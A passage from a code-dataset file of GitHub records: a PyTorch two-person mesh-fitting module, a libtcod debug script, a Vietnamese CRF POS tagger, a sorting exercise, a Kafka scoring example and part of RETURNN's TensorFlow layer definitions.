torch\nimport torch.nn as nn\nimport os\nimport numpy as np\nfrom loguru import logger as guru\nfrom llib.optimizer.build import build_optimizer\nfrom llib.training.fitter import Stopper\nfrom pytorch3d.transforms import axis_angle_to_matrix, matrix_to_axis_angle\n\nclass HHCSOpti(nn.Module):\n \"\"\"HHC optimizes two meshes using image keypoints and discrete\n contact labels.\"\"\"\n def __init__(self,\n opti_cfg,\n camera,\n body_model_h1,\n body_model_h2,\n criterion,\n batch_size=1,\n device='cuda',\n diffusion_module=None,\n renderer=None\n ):\n super(HHCSOpti, self).__init__()\n\n # save config file\n self.opti_cfg = opti_cfg\n self.batch_size = batch_size\n self.device = device\n self.print_loss = opti_cfg.print_loss\n self.render_iters = opti_cfg.render_iters\n\n self.camera = camera\n\n self.body_model_h1 = body_model_h1\n self.body_model_h2 = body_model_h2\n self.faces = torch.from_numpy(\n body_model_h1.faces.astype(np.int32)).to(self.device)\n\n self.diffusion_module = diffusion_module\n\n # human optimization\n self.criterion = criterion\n self.num_iters = opti_cfg.hhcs.max_iters\n\n # parameters to be optimized\n self.optimizables = {\n 0: [\n 'body_model_h1.transl',\n 'body_model_h1.betas',\n 'body_model_h1.body_pose',\n # 'body_model_h1.global_orient',\n 'body_model_h2.transl',\n 'body_model_h2.betas',\n 'body_model_h2.body_pose',\n # 'body_model_h2.global_orient',\n ], \n 1: [\n 'body_model_h1.transl',\n 'body_model_h1.body_pose',\n 'body_model_h2.transl',\n 'body_model_h2.body_pose',\n ],\n } \n\n # if bev guidance also optimize the body global orientation \n # if len(self.diffusion_module.exp_cfg.guidance_params) > 0:\n # self.optimizables[0].extend([\n # 'body_model_h1.global_orient',\n # 'body_model_h2.global_orient',\n # ])\n \n\n # stop criterion \n self.stopper = Stopper(\n num_prev_steps=opti_cfg.hhcs.num_prev_steps,\n slope_tol=opti_cfg.hhcs.slope_tol,\n )\n\n # rendered images per iter\n if self.render_iters:\n self.renderer = renderer\n self.renderings = []\n\n def setup_optimiables(self, stage):\n \n self.final_params = [] \n\n optimizer_type = self.opti_cfg.optimizer.type\n lr = stage_lr = eval(f'self.opti_cfg.optimizer.{optimizer_type}.lr')\n if stage in [1]:\n stage_lr = lr / 10\n\n # camera parameters\n for param_name, param in self.named_parameters():\n if param_name in self.optimizables[stage]:\n param.requires_grad = True\n self.final_params.append({'params': param, 'lr': stage_lr})\n else:\n param.requires_grad = False\n \n @torch.no_grad()\n def fill_params(self, init_human, init_cam):\n \"\"\"Fill the parameters of the human model and camera with the\n initial values.\"\"\"\n\n device = self.body_model_h1.betas.device\n for param_name, param in self.body_model_h1.named_parameters():\n if param_name in init_human.keys():\n init_value = init_human[param_name][[0]].clone().detach().to(device).requires_grad_(True)\n param[:] = init_value\n\n for param_name, param in self.body_model_h2.named_parameters():\n if param_name in init_human.keys():\n init_value = init_human[param_name][[1]].clone().detach().to(device).requires_grad_(True)\n param[:] = init_value\n\n for param_name, param in self.camera.named_parameters():\n if param_name in init_cam.keys():\n init_value = init_cam[param_name].clone().detach().unsqueeze(0).to(device).requires_grad_(True)\n param[:] = init_value\n\n self.camera.iw[:] = init_cam['iw']\n self.camera.ih[:] = init_cam['ih'] \n\n\n def setup_optimizer(self, init_human, init_cam, stage):\n \"\"\"Setup the optimizer for the current stage / reset in stages > 0.\"\"\"\n\n # in the first stage, set the SMPL-X parameters to the initial values \n if stage == 0:\n self.fill_params(init_human, init_cam)\n\n # pick the parameters to be optimized\n self.setup_optimiables(stage)\n\n # build optimizer\n self.optimizer = build_optimizer(\n self.opti_cfg.optimizer, \n self.opti_cfg.optimizer.type,\n self.final_params\n )\n\n def print_losses(self, ld, stage=0, step=0, abbr=True):\n \"\"\"Print the losses for the current stage.\"\"\"\n total_loss = ld['total_loss'].item()\n out = f'Stage/step:{stage:2d}/{step:2} || Tl: {total_loss:.4f} || '\n for k, v in ld.items():\n if k != 'total_loss':\n kprint = ''.join([x[0] for x in k.split('_')]) if abbr else k\n if type(v) == torch.Tensor:\n v = v.item()\n out += f'{kprint}: {v:.4f} | '\n print(out)\n \n def render_current_estimate(self, stage=\"\", iter=\"\", color=['light_blue3', 'light_blue5']):\n \"\"\"Render the current estimates\"\"\"\n\n v1 = self.body_model_h1().vertices.detach()\n v2 = self.body_model_h2().vertices.detach()\n verts = torch.cat([v1,v2], dim=0)\n\n bm = 'smpl' if verts.shape[1] == 6890 else 'smplx'\n self.renderer.update_camera_pose(\n self.camera.pitch.item(), self.camera.yaw.item(), self.camera.roll.item(), \n self.camera.tx.item(), self.camera.ty.item(), self.camera.tz.item()\n )\n rendered_img = self.renderer.render(verts, self.faces, colors = color, body_model=bm)\n color_image = rendered_img[0].detach().cpu().numpy() * 255\n self.renderings.append(color_image)\n\n\n def optimize_humans(\n self,\n #init_h1, \n #init_h2, \n init_human,\n init_camera,\n contact_map,\n stage,\n guidance_params={},\n ): \n \"\"\"Optimize the human parameters for the given stage.\"\"\"\n\n # set the loss weights for the current stage\n self.criterion.set_weights(stage)\n\n for i in range(self.num_iters[stage]):\n \n if self.render_iters:\n colors = {0: ['paper_blue', 'paper_red'], 1: ['paper_blue', 'paper_red']}\n self.render_current_estimate(stage, i, colors[stage])\n\n smpl_output_h1 = self.body_model_h1()\n smpl_output_h2 = self.body_model_h2()\n camera = self.camera\n\n # we tried different approaches / noies levels when using the SDS loss\n if self.opti_cfg.use_diffusion:\n if self.opti_cfg.sds_type == \"fixed\":\n # use fixed value for noise level t\n t_i = self.opti_cfg.sds_t_fixed\n elif self.opti_cfg.sds_type == \"range\":\n # sample random integer between range lower and upper bound\n t_min, t_max = self.opti_cfg.sds_t_range\n t_i = np.random.randint(t_min, t_max, 1)[0]\n elif self.opti_cfg.sds_type == \"adaptive\":\n # change noise level based on iteration\n p = (self.num_iters[stage] - (i+1)) / self.num_iters[stage]\n pidx = int(np.where(np.array(self.opti_cfg.sds_t_adaptive_i) > p)[0][-1])\n t_i = self.opti_cfg.sds_t_adaptive_t[pidx]\n else:\n # without SDS loss, set t to None\n t_i = None\n\n # compute all loss\n loss, loss_dict = self.criterion(\n smpl_output_h1, \n smpl_output_h2, \n camera,\n #init_h1, \n #init_h2,\n init_human,\n init_camera,\n contact_map,\n use_diffusion_prior=self.opti_cfg.use_diffusion,\n diffusion_module=self.diffusion_module,\n t=t_i,\n guidance_params=guidance_params,\n )\n\n if self.print_loss:\n self.print_losses(loss_dict, stage, i)\n\n # optimizer step\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # break if stopping criterion is met\n stop_crit = self.stopper.check(loss.item())\n if stop_crit:\n break\n\n def fit(\n self, \n #init_h1, \n #init_h2,\n init_human,\n init_camera,\n contact_map,\n ): \n \"\"\"Main fitting function running through all stages of optimization\"\"\"\n\n # we project the initial mesh to the image plane and use the keypoints \n # if they're not visible in the image\n with torch.no_grad():\n self.fill_params(init_human, init_camera)\n init_human['init_keypoints'] = torch.cat([\n self.camera.project(self.body_model_h1().joints),\n self.camera.project(self.body_model_h2().joints)], axis=0)\n\n # copy init human params for guidance\n #guidance_params = {k: v.clone().detach() for k, v in init_human.items()}\n guidance_params = {}\n if self.diffusion_module is not None:\n if len(self.diffusion_module.exp_cfg.guidance_params) > 0:\n dbs = self.diffusion_module.bs\n guidance_params = {\n 'orient': init_human['global_orient'].unsqueeze(0).repeat(dbs, 1, 1),\n 'pose': init_human['body_pose'].unsqueeze(0).repeat(dbs, 1, 1),\n 'shape': torch.cat((init_human['betas'], init_human['scale'].unsqueeze(1)), dim=-1).unsqueeze(0).repeat(dbs, 1, 1),\n 'transl': init_human['transl'].unsqueeze(0).repeat(dbs, 1, 1)\n }\n guidance_params = self.diffusion_module.cast_smpl(guidance_params)\n guidance_params = self.diffusion_module.split_humans(guidance_params)\n #else:\n # guidance_params = {} # no guidance params are used here\n\n\n def undo_orient_and_transl(diffusion_module, x_start_smpls, target_rotation, target_transl):\n \n #orient, cam_rotation\n global_orient_h0 = x_start_smpls[0].global_orient.unsqueeze(1) #.repeat(64,1,1)\n global_orient_h1 = x_start_smpls[1].global_orient.unsqueeze(1) #.repeat(64,1,1)\n param = torch.cat((global_orient_h0, global_orient_h1), dim=1)\n param_rotmat = axis_angle_to_matrix(param)\n cam_rotation = torch.einsum('bml,bln->bmn', target_rotation, param_rotmat[:, 0, :, :].transpose(2, 1))\n new_orient = matrix_to_axis_angle(torch.einsum('bnm,bhml->bhnl', cam_rotation, param_rotmat))\n new_orient=new_orient[[0],:,:]\n\n pelvis = torch.cat((\n diffusion_module.body_model(betas=x_start_smpls[0].betas, scale=x_start_smpls[0].scale).joints[:,[0],:],\n diffusion_module.body_model(betas=x_start_smpls[1].betas, scale=x_start_smpls[1].scale).joints[:,[0],:]\n ), dim=1)\n\n transl_h0 = x_start_smpls[0].transl.unsqueeze(1) #.repeat(64,1,1)\n transl_h1 = x_start_smpls[1].transl.unsqueeze(1) #.repeat(64,1,1)\n transl = torch.cat((transl_h0, transl_h1), dim=1)\n root_transl = transl[:,[0],:]\n cam_translation = (-1 * torch.einsum('bhn,bnm->bhm', target_transl + pelvis, cam_rotation)) + root_transl + pelvis\n xx = transl + pelvis - cam_translation\n new_transl = torch.einsum('bhn,bnm->bhm', xx, cam_rotation.transpose(2, 1)) - pelvis\n new_transl=new_transl[[0],:,:]\n\n return new_orient, new_transl\n\n ############ conditional sampling ##############\n if len(guidance_params) > 0:\n # guru.info('Start sampling unconditional')\n cond_ts = np.arange(1, self.diffusion_module.diffusion.num_timesteps, 100)[::-1]\n log_freq = cond_ts.shape[0] # no logging\n x_ts, x_starts = self.diffusion_module.sample_from_model(\n cond_ts, log_freq, guidance_params\n )\n # undo orient and transl\n init_rotation = axis_angle_to_matrix(init_human['global_orient'][0]).detach().clone().repeat(dbs, 1, 1)\n init_transl = init_human['transl'][0].detach().clone().repeat(dbs, 1, 1)\n new_orient, new_transl = undo_orient_and_transl(\n self.diffusion_module, x_starts['final'], init_rotation, init_transl\n )\n for i in range(2):\n for param in ['global_orient', 'body_pose', 'betas', 'transl', 'scale']:\n if param == 'global_orient':\n init_human[param][i] = new_orient[0][i]\n elif param == 'transl':\n init_human[param][i] = new_transl[0][i]\n else:\n i_param = x_starts['final'][i]\n init_human[param][i] = eval(f'i_param.{param}')[0].detach().clone()\n\n # we project the initial mesh to the image plane and use the keypoints \n # if they're not visible in the image\n with torch.no_grad():\n self.fill_params(init_human, init_camera)\n init_human['init_keypoints'] = torch.cat([\n self.camera.project(self.body_model_h1().joints),\n self.camera.project(self.body_model_h2().joints)], axis=0) \n\n # optimize in multiple stages\n for stage, _ in enumerate(range(len(self.num_iters))):\n guru.info(f'Starting with stage: {stage} \\n')\n\n self.stopper.reset() # stopping criterion\n self.setup_optimizer(init_human, init_camera, stage) # setup optimizer\n\n # clone the initial estimate and detach it from the graph since it'll be used\n # as initialization and as prior the optimization\n if stage > 0:\n init_human['body_pose'] = torch.cat([\n self.body_model_h1.body_pose.detach().clone(),\n self.body_model_h2.body_pose.detach().clone()\n ], axis=0)\n init_human['betas'] = torch.cat([\n self.body_model_h1.betas.detach().clone(),\n self.body_model_h2.betas.detach().clone()\n ], axis=0)\n \n # run optmization for one stage\n self.optimize_humans(init_human, init_camera, contact_map, stage, guidance_params)\n \n # Get final loss value and get full skinning\n with torch.no_grad():\n smpl_output_h1 = self.body_model_h1()\n smpl_output_h2 = self.body_model_h2()\n\n return smpl_output_h1, smpl_output_h2\n","repo_name":"muelea/buddi","sub_path":"llib/methods/hhcs_optimization/fit_module.py","file_name":"fit_module.py","file_ext":"py","file_size_in_byte":15201,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"37"} +{"seq_id":"6187232316","text":"\"\"\" Misc functions that can be used to debug crap \"\"\"\nimport os \nfrom lib import libtcodpy as libtcod\n\ndef print_all_chars():\n font_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'assets/terminal8x8_aa_as.png')\n libtcod.console_set_custom_font(font_path, libtcod.FONT_TYPE_GREYSCALE | libtcod.FONT_LAYOUT_ASCII_INCOL)\n libtcod.console_init_root(25, 80, 'Printing all characters', False)\n\n while not libtcod.console_is_window_closed():\n libtcod.console_set_default_foreground(0, libtcod.white)\n j = 0\n i = 1\n for x in xrange(700):\n libtcod.console_put_char(0, i, j, x)\n j += 2\n if j > 80:\n i += 2\n j = 0\n\n libtcod.console_put_char(0, i + 2, 1, 247)\n libtcod.console_flush()\n\nif __name__ == '__main__':\n print_all_chars()\n ","repo_name":"bradykieffer/progue","sub_path":"progue/debug/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15433873286","text":"import re\nimport unicodedata\nimport pycrfsuite\n\n_model_file = 'model.crf.tagger'\n\ndef _get_features(tokens, idx):\n \"\"\"\n Extract basic features about this word including \n - Current Word \n - Is Capitalized ?\n - Has Punctuation ?\n - Has Number ?\n - Suffixes up to length 3\n Note that : we might include feature over previous word, next word ect. \n \n :return : a list which contains the features\n :rtype : list(str) \n \n \"\"\" \n token = tokens[idx]\n \n feature_list = [] \n # Capitalization \n if token[0].isupper():\n feature_list.append('CAPITALIZATION')\n \n # Number \n if re.search(re.compile(r\"\\d\"), token) is not None:\n feature_list.append('HAS_NUM') \n \n # Punctuation\n punc_cat = set([\"Pc\", \"Pd\", \"Ps\", \"Pe\", \"Pi\", \"Pf\", \"Po\"])\n if all (unicodedata.category(x) in punc_cat for x in token):\n feature_list.append('PUNCTUATION')\n \n # Suffix up to length 3\n if len(token) > 1:\n feature_list.append('SUF_' + token[-1:]) \n if len(token) > 2: \n feature_list.append('SUF_' + token[-2:]) \n if len(token) > 3: \n feature_list.append('SUF_' + token[-3:])\n \n feature_list.append('WORD_' + token )\n \n return feature_list\n\ndef tag_sents(sents):\n '''\n Tag a list of sentences. NB before using this function, user should specify the mode_file either by \n - Train a new model using ``train'' function \n - Use the pre-trained model which is set via ``set_model_file'' function \n :params sentences : list of sentences needed to tag. \n :type sentences : list(list(str))\n :return : list of tagged sentences. \n :rtype : list (list (tuple(str,str))) \n '''\n if _model_file == '':\n raise Exception(' No model file is found !! Please use train or set_model_file function')\n \n\n tagger = pycrfsuite.Tagger()\n tagger.open(_model_file) \n # We need the list of sentences instead of the list generator for matching the input and output\n result = [] \n for tokens in sents:\n features = [_get_features(tokens,i) for i in range(len(tokens))]\n labels = tagger.tag(features)\n \n if len(labels) != len(tokens):\n raise Exception(' Predicted Length Not Matched, Expect Errors !')\n \n tagged_sent = list(zip(tokens,labels))\n result.append(tagged_sent)\n \n return result \n\nl = [['học_sinh', 'học', 'sinh_học'],['học_sinh', 'học', 'ăn', '.']]\nprint(tag_sents(l))\n\n","repo_name":"trinhvanminh/VN-POS-tagging","sub_path":"old/tag_sents.py","file_name":"tag_sents.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70243334133","text":"def solution(strings, n):\n answer = []\n index = dict()\n arr1 = []\n for i in strings:\n index[i] = i[n]\n arr1.append(i[n])\n arr = list(set(arr1))\n arr.sort()\n for j in arr:\n emp = []\n for k in index:\n if index[k] == j: emp.append(k)\n emp.sort()\n answer.extend(emp)\n \n return answer\n \n \ndef solution(strings, n):\n answer = []\n for i in range(len(strings)):\n strings[i] = strings[i][n] + strings[i]\n strings.sort() \n for j in strings:\n answer.append(j[1:])\n return answer\n","repo_name":"FlowerLSH/Study1","sub_path":"문자열 마음데로 정렬하기.py","file_name":"문자열 마음데로 정렬하기.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9445682620","text":"from generic_online_ml_scoring.builder import ConsumerTransformerProducerLoop\nfrom generic_online_ml_scoring.builder import GenericModel\nimport math\n\n\nclass SquareAllIntPropsModel(GenericModel):\n def __init__(self):\n print(\"Initialization of model\")\n\n def execute(self, data):\n for key in data:\n yield {\n \"key\": key,\n \"value\": math.pow(int(data[key]), 2)\n }\n\n\nconfig_path = \"../data/testconfig.conf\"\n\nloop = ConsumerTransformerProducerLoop(config_path)\nloop.submit_model(SquareAllIntPropsModel())\nloop.start()\n\n\n","repo_name":"nbchn/online-ml-scoring-kafka","sub_path":"examples/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73039185013","text":"\nimport tensorflow as tf\nfrom TFUtil import Data, OutputWithActivation\n\n\nclass LayerBase(object):\n layer_class = None\n recurrent = False\n\n def __init__(self, name, network, n_out=None, out_type=None, sources=(),\n target=None, loss=None, loss_opts=None, L2=None, is_output_layer=None,\n trainable=True):\n \"\"\"\n :param str name:\n :param TFNetwork.TFNetwork network:\n :param None|int n_out: output dim\n :param dict[str] out_type: kwargs for Data class. more explicit than n_out.\n :param list[LayerBase] sources:\n :param str|None target: if some loss is set, this is the target data-key, i.e. network.extern_data.get_data(target)\n alternatively, this also can be a layer name.\n :param str|None loss: if set, via get_loss\n :param dict[str]|None loss_opts: kwargs for Loss class, if loss is set\n :param float|None L2: for constraints\n :param bool|None is_output_layer:\n :param bool trainable: mostly ignored for now...\n \"\"\"\n self.name = name\n self.network = network\n if loss and not target:\n target = self.network.extern_data.default_target\n self.target = target\n self.loss = None # type: Loss\n if loss:\n loss_class = get_loss_class(loss)\n self.loss = loss_class(**(loss_opts or {}))\n if self.loss.recurrent:\n self.recurrent = True\n if out_type is None and n_out is None and target:\n n_out = self._get_target_value(mark_data_key_as_used=False).dim\n if self.loss:\n n_out = self.loss.get_auto_output_layer_dim(n_out)\n if out_type is None:\n assert n_out\n out_type = {\"dim\": n_out}\n out_type = out_type.copy()\n out_type.setdefault(\"name\", \"%s_output\" % self.name)\n if n_out is not None:\n out_type.setdefault(\"dim\", n_out)\n assert out_type[\"dim\"] == n_out\n # You are supposed to set self.output.{batch_dim_axis,time_dim_axis} explicitly,\n # as well as check the inputs if they are as you would suggest.\n # However, a good default is often to use the same as the input.\n if sources and \"batch_dim_axis\" not in out_type:\n out_type.setdefault(\"batch_dim_axis\", sources[0].output.batch_dim_axis)\n out_type.setdefault(\"time_dim_axis\", sources[0].output.time_dim_axis)\n self.output = Data(**out_type)\n # You are supposed to set self.output.placeholder to the value which you want to return by the layer.\n # Normally you are also supposed to set self.output.size_placeholder explicitly, just like self.output.placeholder.\n # However, in many cases, this will just be {0: time-lengths} and the same as from the input.\n # We check for this case and preset it by that if possible.\n # If you want to have it different in your layer, just overwrite it.\n if sources and sources[0].output.matches_dim_pattern(self.output):\n self.output.size_placeholder = sources[0].output.size_placeholder.copy()\n self.output_before_activation = None # type: None|OutputWithActivation\n self.sources = sources\n self.params = {} # type: dict[str,tf.Variable]\n self.L2 = L2\n self._is_output_layer = is_output_layer\n self.trainable = trainable\n # Stats will be collected by the engine.\n self.stats = {} # type: dict[str,tf.Tensor]\n\n def __repr__(self):\n return \"%s{class=%s, out_type=%s}\" % (\n self.name, self.layer_class, self.output.get_description(with_name=False))\n\n @classmethod\n def cls_get_tf_scope_name(cls, name):\n \"\"\"\n :param str name: layer name\n :return: scope name, might be just name\n \"\"\"\n return name.replace(\":\", \"__\")\n\n @property\n def tf_scope_name(self):\n return self.cls_get_tf_scope_name(name=self.name)\n\n def is_output_layer(self):\n \"\"\"\n Some code differs between an output layer and other layers.\n It is a bit arbitrary what we define as output layer.\n :rtype: bool\n \"\"\"\n if self._is_output_layer is not None:\n return self._is_output_layer\n if self.target:\n return True\n if self.name == \"output\":\n return True\n return False\n\n def add_param(self, param):\n \"\"\"\n :param tf.Variable param:\n :return: param\n :rtype tf.Variable\n \"\"\"\n assert param.name\n self.params[param.name] = param\n return param\n\n def set_param_values_by_dict(self, values_dict, session):\n \"\"\"\n :param dict[str,numpy.ndarray] values_dict:\n :param tf.Session session:\n \"\"\"\n for param_name, values in values_dict.items():\n param = self.params[param_name]\n assert isinstance(param, tf.Variable)\n shape = param.get_shape()\n assert isinstance(shape, tf.TensorShape)\n assert shape.is_fully_defined()\n assert tuple(shape.as_list()) == values.shape\n self.network.get_var_assigner(param).assign(values, session=session)\n\n def get_param_values_dict(self, session):\n \"\"\"\n :param tf.Session session:\n :return: dict name -> values\n :rtype: dict[str,numpy.ndarray]\n \"\"\"\n d = {}\n for param_name, param in self.params.items():\n d[param_name] = param.eval(session)\n return d\n\n def _get_target_value(self, mark_data_key_as_used=True):\n \"\"\"\n :param bool mark_data_key_as_used: forwarded self.network.get_extern_data()\n :rtype: Data | None\n \"\"\"\n if not self.target or self.target == \"none\":\n return None\n if self.network.extern_data.has_data(self.target):\n return self.network.get_extern_data(self.target, mark_data_key_as_used=mark_data_key_as_used)\n if self.target in self.network.layers:\n return self.network.layers[self.target].output\n raise Exception(\"target %r unknown\" % self.target)\n\n def _init_loss(self):\n if self.loss.output is self.output:\n return\n self.loss.init(\n output=self.output,\n output_with_activation=self.output_before_activation,\n target=self._get_target_value())\n\n def get_loss_value(self):\n \"\"\"\n :return: the loss, a scalar value, or None if not set\n :rtype: tf.Tensor | None\n \"\"\"\n if not self.loss:\n return None\n self._init_loss()\n with tf.name_scope(\"loss\"):\n return self.loss.get_value()\n\n def get_error_value(self):\n \"\"\"\n :return: usually the frame error rate, or None if not defined\n :rtype: tf.Tensor | None\n \"\"\"\n if not self.loss:\n return None\n self._init_loss()\n with tf.name_scope(\"error\"):\n return self.loss.get_error()\n\n def get_params_l2_norm(self):\n return 2 * sum([tf.nn.l2_loss(param) for (name, param) in sorted(self.params.items())])\n\n def get_constraints_value(self):\n c = 0\n if self.L2:\n c += self.L2 * self.get_params_l2_norm()\n if c is 0:\n return None\n return c\n\n\nclass SourceLayer(LayerBase):\n layer_class = \"source\"\n\n def __init__(self, network, data_key=None, sources=(), **kwargs):\n \"\"\"\n :param TFNetwork.TFNetwork network:\n :param str|None data_key:\n :param tuple sources:\n \"\"\"\n if data_key is None:\n data_key = network.extern_data.default_input\n assert not sources, \"source layer does not expect sources\"\n data = network.get_extern_data(data_key)\n super(SourceLayer, self).__init__(out_type=data.get_kwargs(), network=network, **kwargs)\n self.output = data\n\n\ndef concat_sources(src_layers):\n \"\"\"\n :param list[LayerBase] src_layers:\n :return: data with placeholders set\n :rtype: Data\n \"\"\"\n assert src_layers, \"need source layers\"\n if len(src_layers) == 1:\n return src_layers[0].output\n assert not src_layers[0].output.sparse, \"sparse concat not supported\"\n shape = src_layers[0].output.shape # without batch-dim\n assert shape, \"source must not be a scalar of layer %r\" % src_layers[0]\n prefix_shape = shape[:-1]\n dim = 0\n dtype = src_layers[0].output.dtype\n batch_dim_axis = src_layers[0].output.batch_dim_axis\n time_dim_axis = src_layers[0].output.time_dim_axis\n for layer in src_layers:\n assert layer.output.dtype == dtype, \"incompatible dtype with layer %r\" % layer\n assert layer.output.batch_dim_axis == batch_dim_axis\n assert layer.output.time_dim_axis == time_dim_axis\n shape = layer.output.shape\n assert layer.output.placeholder.get_shape().ndims == len(shape) + 1 # with batch-dim\n assert shape, \"source must not be a scalar of layer %r\" % layer\n assert shape[:-1] == prefix_shape, \"incompatible concat with layer %r\" % layer\n assert shape[-1], \"source last-dim must be specified of layer %r\" % layer\n dim += shape[-1]\n data = Data(\n name=\"concat_sources\",\n shape=prefix_shape + (dim,),\n dim=dim,\n sparse=False,\n batch_dim_axis=batch_dim_axis,\n time_dim_axis=time_dim_axis,\n dtype=dtype)\n data.placeholder = tf.concat(\n concat_dim=len(prefix_shape) + 1, # one more because this is with batch-dim\n values=[layer.output.placeholder for layer in src_layers])\n data.size_placeholder = src_layers[0].output.size_placeholder.copy()\n return data\n\n\nclass _ConcatInputLayer(LayerBase):\n def __init__(self, dropout=0, mask=None, **kwargs):\n \"\"\"\n :param float dropout:\n :param str|None mask: \"dropout\" or \"unity\" or None\n \"\"\"\n super(_ConcatInputLayer, self).__init__(**kwargs)\n input_data = concat_sources(self.sources)\n\n if self.network.train_flag:\n assert mask in ['dropout', 'unity', None], \"invalid mask: %r\" % mask\n if mask == \"dropout\" or (mask is None and dropout > 0):\n assert 0.0 < dropout < 1.0\n input_data.placeholder = tf.nn.dropout(\n input_data.placeholder,\n keep_prob=1 - dropout,\n # noise_shape is like old behavior for now:\n # all dynamic dimensions (batch,time) will use the same dropout-mask broadcasted.\n noise_shape=input_data.default_broadcast_noise_shape,\n seed=self.network.random.randint(2**31))\n\n self.input_data = input_data\n\n\nclass CopyLayer(_ConcatInputLayer):\n layer_class = \"copy\"\n\n def __init__(self, **kwargs):\n # Dummy out_type for now, will reset layer.\n super(CopyLayer, self).__init__(out_type={\"shape\": ()}, **kwargs)\n self.output = self.input_data\n\n\nclass SliceLayer(_ConcatInputLayer):\n layer_class = \"slice\"\n\n def __init__(self, axis=None, axis_kind=None,\n slice_start=None, slice_end=None, slice_step=None,\n **kwargs):\n \"\"\"\n :param int|None axis:\n :param str|None axis_kind: \"T\" for time, \"B\" for batch, \"F\" for feature\n :param int|None slice_start:\n :param int|None slice_end:\n :param int|None slice_step:\n :param int|None n_out:\n \"\"\"\n # Dummy out_type for now, will reset layer.\n super(SliceLayer, self).__init__(out_type={\"shape\": ()}, **kwargs)\n if axis is not None:\n assert not axis_kind\n assert 0 <= axis < len(self.input_data.batch_shape)\n else:\n assert axis_kind\n axis_kind = axis_kind.upper()\n if axis_kind == \"T\":\n assert self.input_data.time_dim_axis is not None\n axis = self.input_data.time_dim_axis\n elif axis_kind == \"B\":\n assert self.input_data.batch_dim_axis is not None\n axis = self.input_data.batch_dim_axis\n elif axis_kind == \"F\":\n axes = self.input_data.get_axes(exclude_time=True, exclude_batch=True)\n assert len(axes) == 1\n axis = axes[0]\n dim_slice = slice(slice_start, slice_end, slice_step)\n slices = [slice(None, None)] * axis + [dim_slice]\n out_type = self.input_data.get_kwargs()\n axis_wo_batch = self.input_data.get_batch_axis_excluding_batch(axis)\n if axis_wo_batch is not None:\n out_type[\"shape\"] = list(out_type[\"shape\"])\n if out_type[\"shape\"][axis_wo_batch] is not None:\n out_type[\"shape\"][axis_wo_batch] = len(range(out_type[\"shape\"][axis_wo_batch])[dim_slice])\n if axis_wo_batch == len(out_type[\"shape\"]) - 1 and not out_type[\"sparse\"]:\n out_type[\"dim\"] = out_type[\"shape\"][axis_wo_batch]\n self.output = Data(**out_type)\n self.output.size_placeholder = self.input_data.size_placeholder\n if axis == self.input_data.time_dim_axis:\n if slice_start:\n assert slice_start > 0\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] = \\\n tf.maximum(0, self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] - slice_start)\n if slice_end:\n assert slice_end > 0\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] = \\\n tf.minimum(\n tf.shape(self.input_data.placeholder)[self.input_data.time_dim_axis] - slice_end,\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch])\n if slice_step:\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] //= slice_step\n elif axis_wo_batch is not None:\n assert axis_wo_batch not in self.output.size_placeholder\n self.output.placeholder = self.input_data.placeholder[slices]\n\n\nclass LinearLayer(_ConcatInputLayer):\n layer_class = \"linear\"\n\n def __init__(self, activation, with_bias=True, **kwargs):\n super(LinearLayer, self).__init__(**kwargs)\n\n self.activation = activation\n self.with_bias = with_bias\n\n input_data = self.input_data\n n_in = input_data.dim\n n_out = self.output.dim\n assert n_in and n_out, \"%r and %r\" % (input_data, self.output)\n\n W = self.add_param(\n tf.Variable(\n name=\"W\",\n initial_value=tf.contrib.layers.xavier_initializer(seed=self.network.random.randint(2**31))(\n shape=(n_in, n_out))))\n\n if self.with_bias:\n b = self.add_param(tf.Variable(\n name=\"b\",\n initial_value=tf.constant_initializer(value=0, dtype=tf.float32)(\n shape=(n_out,))))\n else:\n b = None\n\n with tf.name_scope(\"linear\"):\n from TFUtil import dot\n x = input_data.placeholder\n ndim = x.get_shape().ndims\n\n if self.input_data.sparse:\n x = tf.nn.embedding_lookup(W, x)\n ndim += 1\n else:\n x = dot(x, W)\n assert x.get_shape().ndims == ndim\n\n if self.with_bias:\n x = tf.add(x, b, name=\"add_bias\")\n assert x.get_shape().ndims == ndim\n\n if self.activation:\n from TFUtil import get_activation_function\n act_func = get_activation_function(self.activation)\n self.output_before_activation = OutputWithActivation(x, act_func=act_func)\n else:\n self.output_before_activation = OutputWithActivation(x)\n x = self.output_before_activation.y\n\n self.output.batch_dim_axis = self.input_data.batch_dim_axis\n self.output.time_dim_axis = self.input_data.time_dim_axis\n self.output.placeholder = x\n\n\nclass SoftmaxLayer(LinearLayer):\n layer_class = \"softmax\"\n\n def __init__(self, activation=\"softmax\", **kwargs):\n super(SoftmaxLayer, self).__init__(activation=activation, **kwargs)\n\n\nclass RecLayer(_ConcatInputLayer):\n layer_class = \"rec\"\n recurrent = True\n _rnn_cells_dict = {}\n\n @classmethod\n def _create_rnn_cells_dict(cls):\n from tensorflow.python.ops import rnn_cell\n import tensorflow.contrib.rnn as rnn_contrib\n import TFNativeOp\n def maybe_add(key, v):\n if isinstance(v, type) and issubclass(v, (rnn_cell.RNNCell, rnn_contrib.FusedRNNCell, TFNativeOp.RecSeqCellOp)):\n name = key\n if name.endswith(\"Cell\"):\n name = name[:-len(\"Cell\")]\n name = name.lower()\n assert name not in cls._rnn_cells_dict\n cls._rnn_cells_dict[name] = v\n for key, v in vars(rnn_cell).items():\n maybe_add(key, v)\n for key, v in vars(rnn_contrib).items():\n maybe_add(key, v)\n for key, v in vars(TFNativeOp).items():\n maybe_add(key, v)\n\n def __init__(self, unit=\"lstm\", 